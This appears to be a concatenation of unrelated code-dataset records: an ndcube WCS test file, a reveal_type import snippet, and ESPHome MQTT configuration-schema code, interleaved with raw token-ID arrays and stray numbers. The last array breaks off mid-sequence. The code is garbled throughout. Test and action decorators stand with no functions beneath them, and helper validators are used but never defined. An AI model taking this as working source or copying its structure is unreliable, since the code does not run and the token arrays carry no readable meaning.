# -*- coding: utf-8 -*- import pytest import unittest import numpy as np import astropy.wcs from ndcube import utils from ndcube.tests import helpers ht = {'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2, 'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0, 'NAXIS2': 3, 'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4} wt = utils.wcs.WCS(header=ht, naxis=3) ht_with_celestial = { 'CTYPE4': 'HPLN-TAN', 'CUNIT4': 'deg', 'CDELT4': 1, 'CRPIX4': 0, 'CRVAL4': 0, 'NAXIS4': 1, 'CNAME4': 'redundant axis', 'CROTA4': 0, 'CTYPE3': 'HPLT-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.5, 'CRPIX3': 0, 'CRVAL3': 0, 'NAXIS3': 2, 'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 0, 'NAXIS2': 3, 'CTYPE1': 'TIME ', 'CUNIT1': 'min', 'CDELT1': 0.4, 'CRPIX1': 0, 'CRVAL1': 0, 'NAXIS1': 4} hm = {'CTYPE1': 'WAVE ', 'CUNIT1': 'Angstrom', 'CDELT1': 0.2, 'CRPIX1': 0, 'CRVAL1': 10, 'NAXIS1': 4, 'CTYPE2': 'HPLT-TAN', 'CUNIT2': 'deg', 'CDELT2': 0.5, 'CRPIX2': 2, 'CRVAL2': 0.5, 'NAXIS2': 3, 'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2} wm = utils.wcs.WCS(header=hm, naxis=3) hm_reindexed_102 = { 'CTYPE2': 'WAVE ', 'CUNIT2': 'Angstrom', 'CDELT2': 0.2, 'CRPIX2': 0, 'CRVAL2': 10, 'NAXIS2': 4, 'CTYPE1': 'HPLT-TAN', 'CUNIT1': 'deg', 'CDELT1': 0.5, 'CRPIX1': 2, 'CRVAL1': 0.5, 'NAXIS1': 3, 'CTYPE3': 'HPLN-TAN', 'CUNIT3': 'deg', 'CDELT3': 0.4, 'CRPIX3': 2, 'CRVAL3': 1, 'NAXIS3': 2} wm_reindexed_102 = utils.wcs.WCS(header=hm_reindexed_102, naxis=3) @pytest.mark.parametrize("test_input,expected", [(ht, True), (hm, False)]) @pytest.mark.parametrize("test_input,expected", [((ht, 3), ht_with_celestial)]) @pytest.mark.parametrize( "test_input,expected", [({}, False), ([slice(1, 5), slice(-1, -5, -2)], True)]) @pytest.mark.parametrize( "test_input,expected", [({}, []), ((slice(1, 2), slice(1, 3), 2, slice(2, 4), 8), [slice(1, 2, None), slice(1, 3, None), slice(2, 3, None), slice(2, 4, None), slice(8, 9, None)])]) @pytest.mark.parametrize("test_input,expected", [ ((wm, np.array([1, 0, 2])), wm_reindexed_102), ((wm, np.array([1, 0, -1])), wm_reindexed_102) ]) @pytest.mark.parametrize("test_input", [ (TypeError, wm, 0), (TypeError, wm, np.array(['spam', 'eggs', 'ham'])), ]) @pytest.mark.parametrize("test_input,expected", [ ((wm, 0, [False, False, False]), (0, 1)), ((wm, 1, [False, False, False]), (0, 1)), ((wm, 2, [False, False, False]), (2,)), ((wm, 1, [False, False, True]), (1,)) ]) @pytest.mark.parametrize("test_input,expected", [ ((wm, 0), (0,)), ((wm, 1), (1, 2)), ((wm, 2), (1, 2)), ]) @pytest.mark.parametrize("test_input,expected", [ (wm, np.array([[True, False, False], [False, True, True], [False, True, True]])), (wt, np.array([[True, False, False, False], [False, True, False, False], [False, False, True, True], [False, False, True, True]])), (wm_reindexed_102, np.array([[True, False, True], [False, True, False], [True, False, True]])) ])
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 12972, 9288, 198, 11748, 555, 715, 395, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 6468, 28338, 13, 12712, 198, 198, 6738, 299, 17896, 3266, 1330, 3384, 4487, 198, 6738, 299, 17896, 3266, 13, 41989, 1330, 49385, 628, 198, 4352, 796, 1391, 6, 4177, 56, 11401, 18, 10354, 705, 39, 6489, 51, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 18, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 18, 10354, 657, 13, 20, 11, 705, 9419, 47, 10426, 18, 10354, 657, 11, 705, 9419, 23428, 18, 10354, 657, 11, 705, 4535, 55, 1797, 18, 10354, 362, 11, 198, 220, 220, 220, 220, 220, 705, 4177, 56, 11401, 17, 10354, 705, 15543, 6089, 220, 220, 220, 46083, 705, 34, 4944, 2043, 17, 10354, 705, 13450, 20282, 3256, 705, 8610, 3698, 51, 17, 10354, 657, 13, 17, 11, 705, 9419, 47, 10426, 17, 10354, 657, 11, 705, 9419, 23428, 17, 10354, 657, 11, 198, 220, 220, 220, 220, 220, 705, 4535, 55, 1797, 17, 10354, 513, 11, 198, 220, 220, 220, 220, 220, 705, 4177, 56, 11401, 16, 10354, 705, 34694, 220, 220, 220, 46083, 705, 34, 4944, 2043, 16, 10354, 705, 1084, 3256, 705, 8610, 3698, 51, 16, 10354, 657, 13, 19, 11, 705, 9419, 47, 10426, 16, 10354, 657, 11, 705, 9419, 23428, 16, 10354, 657, 11, 705, 4535, 55, 1797, 16, 10354, 604, 92, 198, 46569, 796, 3384, 4487, 13, 12712, 13, 54, 7902, 7, 25677, 28, 4352, 11, 299, 22704, 28, 18, 8, 198, 198, 4352, 62, 4480, 62, 5276, 21711, 796, 1391, 198, 220, 220, 220, 705, 4177, 56, 11401, 19, 10354, 705, 39, 6489, 45, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 19, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 19, 10354, 352, 11, 705, 9419, 47, 10426, 19, 10354, 657, 11, 705, 9419, 23428, 19, 10354, 657, 11, 705, 4535, 55, 1797, 19, 10354, 352, 11, 198, 220, 220, 220, 705, 34, 20608, 19, 10354, 705, 445, 917, 415, 16488, 3256, 705, 9419, 29009, 19, 10354, 657, 11, 198, 220, 220, 220, 705, 4177, 56, 11401, 18, 10354, 705, 39, 6489, 51, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 18, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 18, 10354, 657, 13, 20, 11, 705, 9419, 47, 10426, 18, 10354, 657, 11, 705, 9419, 23428, 18, 10354, 657, 11, 705, 4535, 55, 1797, 18, 10354, 362, 11, 198, 220, 220, 220, 705, 4177, 56, 11401, 17, 10354, 705, 15543, 6089, 220, 220, 220, 46083, 705, 34, 4944, 2043, 17, 10354, 705, 13450, 20282, 3256, 705, 8610, 3698, 51, 17, 10354, 657, 13, 17, 11, 705, 9419, 47, 10426, 17, 10354, 657, 11, 705, 9419, 23428, 17, 10354, 657, 11, 198, 220, 220, 220, 705, 4535, 55, 1797, 17, 10354, 513, 11, 198, 220, 220, 220, 705, 4177, 56, 11401, 16, 10354, 705, 34694, 220, 220, 220, 46083, 705, 34, 4944, 2043, 16, 10354, 705, 1084, 3256, 705, 8610, 3698, 51, 16, 10354, 657, 13, 19, 11, 705, 9419, 47, 10426, 16, 10354, 657, 11, 705, 9419, 23428, 16, 10354, 657, 11, 705, 4535, 55, 1797, 16, 10354, 604, 92, 198, 198, 23940, 796, 1391, 6, 4177, 56, 11401, 16, 10354, 705, 15543, 6089, 220, 220, 220, 46083, 705, 34, 4944, 2043, 16, 10354, 705, 13450, 20282, 3256, 705, 8610, 3698, 51, 16, 10354, 657, 13, 17, 11, 705, 9419, 47, 10426, 16, 10354, 657, 11, 705, 9419, 23428, 16, 10354, 838, 11, 198, 220, 220, 220, 220, 220, 705, 4535, 55, 1797, 16, 10354, 604, 11, 198, 220, 220, 220, 220, 220, 705, 4177, 56, 11401, 17, 10354, 705, 39, 6489, 51, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 17, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 17, 10354, 657, 13, 20, 11, 705, 9419, 47, 10426, 17, 10354, 362, 11, 705, 9419, 23428, 17, 10354, 657, 13, 20, 11, 198, 220, 220, 220, 220, 220, 705, 4535, 55, 1797, 17, 10354, 513, 11, 198, 220, 220, 220, 220, 220, 705, 4177, 56, 11401, 18, 10354, 705, 39, 6489, 45, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 18, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 18, 10354, 657, 13, 19, 11, 705, 9419, 47, 10426, 18, 10354, 362, 11, 705, 9419, 23428, 18, 10354, 352, 11, 705, 4535, 55, 1797, 18, 10354, 362, 92, 198, 26377, 796, 3384, 4487, 13, 12712, 13, 54, 7902, 7, 25677, 28, 23940, 11, 299, 22704, 28, 18, 8, 198, 198, 23940, 62, 260, 9630, 276, 62, 15377, 796, 1391, 198, 220, 220, 220, 705, 4177, 56, 11401, 17, 10354, 705, 15543, 6089, 220, 220, 220, 46083, 705, 34, 4944, 2043, 17, 10354, 705, 13450, 20282, 3256, 705, 8610, 3698, 51, 17, 10354, 657, 13, 17, 11, 705, 9419, 47, 10426, 17, 10354, 657, 11, 705, 9419, 23428, 17, 10354, 838, 11, 198, 220, 220, 220, 705, 4535, 55, 1797, 17, 10354, 604, 11, 198, 220, 220, 220, 705, 4177, 56, 11401, 16, 10354, 705, 39, 6489, 51, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 16, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 16, 10354, 657, 13, 20, 11, 705, 9419, 47, 10426, 16, 10354, 362, 11, 705, 9419, 23428, 16, 10354, 657, 13, 20, 11, 705, 4535, 55, 1797, 16, 10354, 513, 11, 198, 220, 220, 220, 705, 4177, 56, 11401, 18, 10354, 705, 39, 6489, 45, 12, 51, 1565, 3256, 705, 34, 4944, 2043, 18, 10354, 705, 13500, 3256, 705, 8610, 3698, 51, 18, 10354, 657, 13, 19, 11, 705, 9419, 47, 10426, 18, 10354, 362, 11, 705, 9419, 23428, 18, 10354, 352, 11, 705, 4535, 55, 1797, 18, 10354, 362, 92, 198, 26377, 62, 260, 9630, 276, 62, 15377, 796, 3384, 4487, 13, 12712, 13, 54, 7902, 7, 25677, 28, 23940, 62, 260, 9630, 276, 62, 15377, 11, 299, 22704, 28, 18, 8, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 47527, 4352, 11, 6407, 828, 357, 23940, 11, 10352, 8, 12962, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 685, 19510, 4352, 11, 513, 828, 289, 83, 62, 4480, 62, 5276, 21711, 8, 12962, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7, 198, 220, 220, 220, 366, 9288, 62, 15414, 11, 40319, 1600, 198, 220, 220, 220, 685, 15090, 5512, 10352, 828, 198, 220, 220, 220, 220, 29565, 48369, 7, 16, 11, 642, 828, 16416, 32590, 16, 11, 532, 20, 11, 532, 17, 8, 4357, 6407, 8, 12962, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7, 198, 220, 220, 220, 366, 9288, 62, 15414, 11, 40319, 1600, 198, 220, 220, 220, 685, 15090, 5512, 17635, 828, 198, 220, 220, 220, 220, 14808, 48369, 7, 16, 11, 362, 828, 16416, 7, 16, 11, 513, 828, 362, 11, 16416, 7, 17, 11, 604, 828, 807, 828, 198, 220, 220, 220, 220, 220, 685, 48369, 7, 16, 11, 362, 11, 6045, 828, 16416, 7, 16, 11, 513, 11, 6045, 828, 16416, 7, 17, 11, 513, 11, 6045, 828, 198, 220, 220, 220, 220, 220, 220, 16416, 7, 17, 11, 604, 11, 6045, 828, 16416, 7, 23, 11, 860, 11, 6045, 8, 12962, 12962, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 685, 198, 220, 220, 220, 14808, 26377, 11, 45941, 13, 18747, 26933, 16, 11, 657, 11, 362, 12962, 828, 266, 76, 62, 260, 9630, 276, 62, 15377, 828, 198, 220, 220, 220, 14808, 26377, 11, 45941, 13, 18747, 26933, 16, 11, 657, 11, 532, 16, 12962, 828, 266, 76, 62, 260, 9630, 276, 62, 15377, 8, 198, 220, 220, 220, 33761, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 1600, 685, 198, 220, 220, 220, 357, 6030, 12331, 11, 266, 76, 11, 657, 828, 198, 220, 220, 220, 357, 6030, 12331, 11, 266, 76, 11, 45941, 13, 18747, 7, 17816, 2777, 321, 3256, 705, 33856, 82, 3256, 705, 2763, 6, 12962, 828, 198, 220, 220, 220, 33761, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 685, 198, 220, 220, 220, 14808, 26377, 11, 657, 11, 685, 25101, 11, 10352, 11, 10352, 46570, 357, 15, 11, 352, 36911, 198, 220, 220, 220, 14808, 26377, 11, 352, 11, 685, 25101, 11, 10352, 11, 10352, 46570, 357, 15, 11, 352, 36911, 198, 220, 220, 220, 14808, 26377, 11, 362, 11, 685, 25101, 11, 10352, 11, 10352, 46570, 357, 17, 35751, 828, 198, 220, 220, 220, 14808, 26377, 11, 352, 11, 685, 25101, 11, 10352, 11, 6407, 46570, 357, 16, 11, 4008, 198, 220, 220, 220, 33761, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 685, 198, 220, 220, 220, 14808, 26377, 11, 657, 828, 357, 15, 35751, 828, 198, 220, 220, 220, 14808, 26377, 11, 352, 828, 357, 16, 11, 362, 36911, 198, 220, 220, 220, 14808, 26377, 11, 362, 828, 357, 16, 11, 362, 36911, 198, 220, 220, 220, 33761, 628, 198, 31, 9078, 9288, 13, 4102, 13, 17143, 316, 380, 2736, 7203, 9288, 62, 15414, 11, 40319, 1600, 685, 198, 220, 220, 220, 357, 26377, 11, 45941, 13, 18747, 26933, 58, 17821, 11, 10352, 11, 10352, 4357, 685, 25101, 11, 6407, 11, 6407, 4357, 685, 25101, 11, 6407, 11, 6407, 11907, 36911, 198, 220, 220, 220, 357, 46569, 11, 45941, 13, 18747, 26933, 58, 17821, 11, 10352, 11, 10352, 11, 10352, 4357, 685, 25101, 11, 6407, 11, 10352, 11, 10352, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 25101, 11, 10352, 11, 6407, 11, 6407, 4357, 685, 25101, 11, 10352, 11, 6407, 11, 6407, 11907, 36911, 198, 220, 220, 220, 357, 26377, 62, 260, 9630, 276, 62, 15377, 11, 45941, 13, 18747, 26933, 58, 17821, 11, 10352, 11, 6407, 4357, 685, 25101, 11, 6407, 11, 10352, 4357, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 685, 17821, 11, 10352, 11, 6407, 11907, 4008, 198, 220, 220, 220, 33761, 198 ]
1.907887
1,737
import foo.bar.baz __all__ = ["foo", "baz"] reveal_type(foo) reveal_type(foo.bar) reveal_type(foo.bar.baz) reveal_type(foo.bar.baz.x) reveal_type(baz) reveal_type(bar.baz)
[ 11748, 22944, 13, 5657, 13, 65, 1031, 198, 198, 834, 439, 834, 796, 14631, 21943, 1600, 366, 65, 1031, 8973, 198, 198, 36955, 282, 62, 4906, 7, 21943, 8, 198, 36955, 282, 62, 4906, 7, 21943, 13, 5657, 8, 198, 36955, 282, 62, 4906, 7, 21943, 13, 5657, 13, 65, 1031, 8, 198, 36955, 282, 62, 4906, 7, 21943, 13, 5657, 13, 65, 1031, 13, 87, 8, 198, 36955, 282, 62, 4906, 7, 65, 1031, 8, 198, 36955, 282, 62, 4906, 7, 5657, 13, 65, 1031, 8, 198 ]
1.977273
88
import re import esphome.codegen as cg import esphome.config_validation as cv from esphome import automation from esphome.automation import Condition from esphome.components import logger from esphome.const import ( CONF_AVAILABILITY, CONF_BIRTH_MESSAGE, CONF_BROKER, CONF_CERTIFICATE_AUTHORITY, CONF_CLIENT_ID, CONF_COMMAND_TOPIC, CONF_COMMAND_RETAIN, CONF_DISCOVERY, CONF_DISCOVERY_PREFIX, CONF_DISCOVERY_RETAIN, CONF_DISCOVERY_UNIQUE_ID_GENERATOR, CONF_DISCOVERY_OBJECT_ID_GENERATOR, CONF_ID, CONF_KEEPALIVE, CONF_LEVEL, CONF_LOG_TOPIC, CONF_ON_JSON_MESSAGE, CONF_ON_MESSAGE, CONF_ON_CONNECT, CONF_ON_DISCONNECT, CONF_PASSWORD, CONF_PAYLOAD, CONF_PAYLOAD_AVAILABLE, CONF_PAYLOAD_NOT_AVAILABLE, CONF_PORT, CONF_QOS, CONF_REBOOT_TIMEOUT, CONF_RETAIN, CONF_SHUTDOWN_MESSAGE, CONF_SSL_FINGERPRINTS, CONF_STATE_TOPIC, CONF_TOPIC, CONF_TOPIC_PREFIX, CONF_TRIGGER_ID, CONF_USE_ABBREVIATIONS, CONF_USERNAME, CONF_WILL_MESSAGE, ) from esphome.core import coroutine_with_priority, CORE from esphome.components.esp32 import add_idf_sdkconfig_option DEPENDENCIES = ["network"] AUTO_LOAD = ["json"] CONF_IDF_SEND_ASYNC = "idf_send_async" CONF_SKIP_CERT_CN_CHECK = "skip_cert_cn_check" MQTT_MESSAGE_BASE = cv.Schema( { cv.Required(CONF_TOPIC): cv.publish_topic, cv.Optional(CONF_QOS, default=0): cv.mqtt_qos, cv.Optional(CONF_RETAIN, default=True): cv.boolean, } ) MQTT_MESSAGE_TEMPLATE_SCHEMA = cv.Any( None, MQTT_MESSAGE_BASE, validate_message_just_topic ) MQTT_MESSAGE_SCHEMA = cv.Any( None, MQTT_MESSAGE_BASE.extend( { cv.Required(CONF_PAYLOAD): cv.mqtt_payload, } ), ) mqtt_ns = cg.esphome_ns.namespace("mqtt") MQTTMessage = mqtt_ns.struct("MQTTMessage") MQTTClientComponent = mqtt_ns.class_("MQTTClientComponent", cg.Component) MQTTPublishAction = mqtt_ns.class_("MQTTPublishAction", automation.Action) MQTTPublishJsonAction = mqtt_ns.class_("MQTTPublishJsonAction", automation.Action) MQTTMessageTrigger = mqtt_ns.class_( "MQTTMessageTrigger", automation.Trigger.template(cg.std_string), cg.Component ) MQTTJsonMessageTrigger = mqtt_ns.class_( "MQTTJsonMessageTrigger", automation.Trigger.template(cg.JsonObjectConst) ) MQTTConnectTrigger = mqtt_ns.class_("MQTTConnectTrigger", automation.Trigger.template()) MQTTDisconnectTrigger = mqtt_ns.class_( "MQTTDisconnectTrigger", automation.Trigger.template() ) MQTTComponent = mqtt_ns.class_("MQTTComponent", cg.Component) MQTTConnectedCondition = mqtt_ns.class_("MQTTConnectedCondition", Condition) MQTTBinarySensorComponent = mqtt_ns.class_("MQTTBinarySensorComponent", MQTTComponent) MQTTClimateComponent = mqtt_ns.class_("MQTTClimateComponent", MQTTComponent) MQTTCoverComponent = mqtt_ns.class_("MQTTCoverComponent", MQTTComponent) MQTTFanComponent = mqtt_ns.class_("MQTTFanComponent", MQTTComponent) MQTTJSONLightComponent = mqtt_ns.class_("MQTTJSONLightComponent", MQTTComponent) MQTTSensorComponent = mqtt_ns.class_("MQTTSensorComponent", MQTTComponent) MQTTSwitchComponent = mqtt_ns.class_("MQTTSwitchComponent", MQTTComponent) MQTTTextSensor = mqtt_ns.class_("MQTTTextSensor", MQTTComponent) MQTTNumberComponent = mqtt_ns.class_("MQTTNumberComponent", MQTTComponent) MQTTSelectComponent = mqtt_ns.class_("MQTTSelectComponent", MQTTComponent) MQTTButtonComponent = mqtt_ns.class_("MQTTButtonComponent", MQTTComponent) MQTTLockComponent = mqtt_ns.class_("MQTTLockComponent", MQTTComponent) MQTTDiscoveryUniqueIdGenerator = mqtt_ns.enum("MQTTDiscoveryUniqueIdGenerator") MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS = { "legacy": MQTTDiscoveryUniqueIdGenerator.MQTT_LEGACY_UNIQUE_ID_GENERATOR, "mac": MQTTDiscoveryUniqueIdGenerator.MQTT_MAC_ADDRESS_UNIQUE_ID_GENERATOR, } MQTTDiscoveryObjectIdGenerator = mqtt_ns.enum("MQTTDiscoveryObjectIdGenerator") MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS = { "none": MQTTDiscoveryObjectIdGenerator.MQTT_NONE_OBJECT_ID_GENERATOR, "device_name": MQTTDiscoveryObjectIdGenerator.MQTT_DEVICE_NAME_OBJECT_ID_GENERATOR, } CONFIG_SCHEMA = cv.All( cv.Schema( { cv.GenerateID(): cv.declare_id(MQTTClientComponent), cv.Required(CONF_BROKER): cv.string_strict, cv.Optional(CONF_PORT, default=1883): cv.port, cv.Optional(CONF_USERNAME, default=""): cv.string, cv.Optional(CONF_PASSWORD, default=""): cv.string, cv.Optional(CONF_CLIENT_ID): cv.string, cv.SplitDefault(CONF_IDF_SEND_ASYNC, esp32_idf=False): cv.All( cv.boolean, cv.only_with_esp_idf ), cv.Optional(CONF_CERTIFICATE_AUTHORITY): cv.All( cv.string, cv.only_with_esp_idf ), cv.SplitDefault(CONF_SKIP_CERT_CN_CHECK, esp32_idf=False): cv.All( cv.boolean, cv.only_with_esp_idf ), cv.Optional(CONF_DISCOVERY, default=True): cv.Any( cv.boolean, cv.one_of("CLEAN", upper=True) ), cv.Optional(CONF_DISCOVERY_RETAIN, default=True): cv.boolean, cv.Optional( CONF_DISCOVERY_PREFIX, default="homeassistant" ): cv.publish_topic, cv.Optional(CONF_DISCOVERY_UNIQUE_ID_GENERATOR, default="legacy"): cv.enum( MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS ), cv.Optional(CONF_DISCOVERY_OBJECT_ID_GENERATOR, default="none"): cv.enum( MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS ), cv.Optional(CONF_USE_ABBREVIATIONS, default=True): cv.boolean, cv.Optional(CONF_BIRTH_MESSAGE): MQTT_MESSAGE_SCHEMA, cv.Optional(CONF_WILL_MESSAGE): MQTT_MESSAGE_SCHEMA, cv.Optional(CONF_SHUTDOWN_MESSAGE): MQTT_MESSAGE_SCHEMA, cv.Optional(CONF_TOPIC_PREFIX, default=lambda: CORE.name): cv.publish_topic, cv.Optional(CONF_LOG_TOPIC): cv.Any( None, MQTT_MESSAGE_BASE.extend( { cv.Optional(CONF_LEVEL): logger.is_log_level, } ), validate_message_just_topic, ), cv.Optional(CONF_SSL_FINGERPRINTS): cv.All( cv.only_on_esp8266, cv.ensure_list(validate_fingerprint) ), cv.Optional(CONF_KEEPALIVE, default="15s"): cv.positive_time_period_seconds, cv.Optional( CONF_REBOOT_TIMEOUT, default="15min" ): cv.positive_time_period_milliseconds, cv.Optional(CONF_ON_CONNECT): automation.validate_automation( { cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTConnectTrigger), } ), cv.Optional(CONF_ON_DISCONNECT): automation.validate_automation( { cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id( MQTTDisconnectTrigger ), } ), cv.Optional(CONF_ON_MESSAGE): automation.validate_automation( { cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTMessageTrigger), cv.Required(CONF_TOPIC): cv.subscribe_topic, cv.Optional(CONF_QOS, default=0): cv.mqtt_qos, cv.Optional(CONF_PAYLOAD): cv.string_strict, } ), cv.Optional(CONF_ON_JSON_MESSAGE): automation.validate_automation( { cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id( MQTTJsonMessageTrigger ), cv.Required(CONF_TOPIC): cv.subscribe_topic, cv.Optional(CONF_QOS, default=0): cv.mqtt_qos, } ), } ), validate_config, ) @coroutine_with_priority(40.0) MQTT_PUBLISH_ACTION_SCHEMA = cv.Schema( { cv.GenerateID(): cv.use_id(MQTTClientComponent), cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic), cv.Required(CONF_PAYLOAD): cv.templatable(cv.mqtt_payload), cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos), cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean), } ) @automation.register_action( "mqtt.publish", MQTTPublishAction, MQTT_PUBLISH_ACTION_SCHEMA ) MQTT_PUBLISH_JSON_ACTION_SCHEMA = cv.Schema( { cv.GenerateID(): cv.use_id(MQTTClientComponent), cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic), cv.Required(CONF_PAYLOAD): cv.lambda_, cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos), cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean), } ) @automation.register_action( "mqtt.publish_json", MQTTPublishJsonAction, MQTT_PUBLISH_JSON_ACTION_SCHEMA ) @automation.register_condition( "mqtt.connected", MQTTConnectedCondition, cv.Schema( { cv.GenerateID(): cv.use_id(MQTTClientComponent), } ), )
[ 11748, 302, 198, 198, 11748, 1658, 746, 462, 13, 8189, 5235, 355, 269, 70, 198, 11748, 1658, 746, 462, 13, 11250, 62, 12102, 341, 355, 269, 85, 198, 6738, 1658, 746, 462, 1330, 22771, 198, 6738, 1658, 746, 462, 13, 2306, 296, 341, 1330, 24295, 198, 6738, 1658, 746, 462, 13, 5589, 3906, 1330, 49706, 198, 6738, 1658, 746, 462, 13, 9979, 1330, 357, 198, 220, 220, 220, 7102, 37, 62, 10116, 32, 47164, 25382, 11, 198, 220, 220, 220, 7102, 37, 62, 3483, 49, 4221, 62, 44, 1546, 4090, 8264, 11, 198, 220, 220, 220, 7102, 37, 62, 11473, 11380, 1137, 11, 198, 220, 220, 220, 7102, 37, 62, 34, 17395, 30643, 6158, 62, 32, 24318, 1581, 9050, 11, 198, 220, 220, 220, 7102, 37, 62, 5097, 28495, 62, 2389, 11, 198, 220, 220, 220, 7102, 37, 62, 9858, 44, 6981, 62, 35222, 2149, 11, 198, 220, 220, 220, 7102, 37, 62, 9858, 44, 6981, 62, 2200, 30339, 11, 198, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 11, 198, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 62, 47, 31688, 10426, 11, 198, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 62, 2200, 30339, 11, 198, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 62, 4944, 33866, 8924, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 220, 220, 220, 7102, 37, 62, 26288, 8220, 5959, 56, 62, 9864, 23680, 62, 2389, 62, 35353, 1137, 25633, 11, 198, 220, 220, 220, 7102, 37, 62, 2389, 11, 198, 220, 220, 220, 7102, 37, 62, 42, 35238, 1847, 9306, 11, 198, 220, 220, 220, 7102, 37, 62, 2538, 18697, 11, 198, 220, 220, 220, 7102, 37, 62, 25294, 62, 35222, 2149, 11, 198, 220, 220, 220, 7102, 37, 62, 1340, 62, 40386, 62, 44, 1546, 4090, 8264, 11, 198, 220, 220, 220, 7102, 37, 62, 1340, 62, 44, 1546, 4090, 8264, 11, 198, 220, 220, 220, 7102, 37, 62, 1340, 62, 10943, 48842, 11, 198, 220, 220, 220, 7102, 37, 62, 1340, 62, 26288, 10943, 48842, 11, 198, 220, 220, 220, 7102, 37, 62, 47924, 54, 12532, 11, 198, 220, 220, 220, 7102, 37, 62, 4537, 56, 35613, 11, 198, 220, 220, 220, 7102, 37, 62, 4537, 56, 35613, 62, 10116, 32, 4146, 17534, 11, 198, 220, 220, 220, 7102, 37, 62, 4537, 56, 35613, 62, 11929, 62, 10116, 32, 4146, 17534, 11, 198, 220, 220, 220, 7102, 37, 62, 15490, 11, 198, 220, 220, 220, 7102, 37, 62, 48, 2640, 11, 198, 220, 220, 220, 7102, 37, 62, 2200, 8202, 2394, 62, 34694, 12425, 11, 198, 220, 220, 220, 7102, 37, 62, 2200, 30339, 11, 198, 220, 220, 220, 7102, 37, 62, 9693, 3843, 41925, 62, 44, 1546, 4090, 8264, 11, 198, 220, 220, 220, 7102, 37, 62, 31127, 62, 37, 2751, 1137, 4805, 1268, 4694, 11, 198, 220, 220, 220, 7102, 37, 62, 44724, 62, 35222, 2149, 11, 198, 220, 220, 220, 7102, 37, 62, 35222, 2149, 11, 198, 220, 220, 220, 7102, 37, 62, 35222, 2149, 62, 47, 31688, 10426, 11, 198, 220, 220, 220, 7102, 37, 62, 5446, 3528, 30373, 62, 2389, 11, 198, 220, 220, 220, 7102, 37, 62, 19108, 62, 6242, 40438, 12861, 18421, 11, 198, 220, 220, 220, 7102, 37, 62, 29904, 20608, 11, 198, 220, 220, 220, 7102, 37, 62, 54, 8267, 62, 44, 1546, 4090, 8264, 11, 198, 8, 198, 6738, 1658, 746, 462, 13, 7295, 1330, 1162, 28399, 62, 4480, 62, 49336, 11, 327, 6965, 198, 6738, 1658, 746, 462, 13, 5589, 3906, 13, 9774, 2624, 1330, 751, 62, 312, 69, 62, 21282, 74, 11250, 62, 18076, 198, 198, 46162, 10619, 24181, 11015, 796, 14631, 27349, 8973, 198, 198, 39371, 46, 62, 35613, 796, 14631, 17752, 8973, 198, 198, 10943, 37, 62, 2389, 37, 62, 50, 10619, 62, 26483, 7792, 796, 366, 312, 69, 62, 21280, 62, 292, 13361, 1, 198, 